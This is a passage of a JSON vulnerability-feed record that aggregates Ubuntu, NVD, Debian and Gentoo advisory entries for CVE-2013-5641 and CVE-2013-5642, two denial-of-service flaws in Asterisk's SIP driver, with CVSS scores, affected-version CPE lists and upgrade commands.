"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5642", "href": "https://ubuntu.com/security/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source\n1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1\nand Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before\n11.2-cert2 allows remote attackers to cause a denial of service (NULL\npointer dereference, segmentation fault, and daemon crash) via an ACK with\nSDP to a previously terminated channel. NOTE: some of these details are\nobtained from third party information.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5641", "href": "https://ubuntu.com/security/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:40:26", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5642", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk_digiumphones:10.11.0", "cpe:/a:digium:asterisk_digiumphones:10.12.1", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:10.12.1", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:10.12.2", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk_digiumphones:10.12.2", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk_digiumphones:10.0.0", "cpe:/a:digium:asterisk:10.12.0", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk_digiumphones:10.12.0", "cpe:/a:digium:asterisk:11.3.0", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:1.8.18.1"], "id": "CVE-2013-5642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:40:28", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5641", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:11.3.0", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:1.8.18.1"], "id": "CVE-2013-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-03-27T19:28:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5642", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-27T19:28:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5641", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:09:28", "description": "### Background\n\nAsterisk is an open source telephony engine and toolkit.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Asterisk 11.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-11.7.0\"\n \n\nAll Asterisk 1.8.* users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/asterisk-1.8.25.0\"", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "gentoo", "title": "Asterisk: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2014-01-21T00:00:00", "id": "GLSA-201401-15", "href": "https://security.gentoo.org/glsa/201401-15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}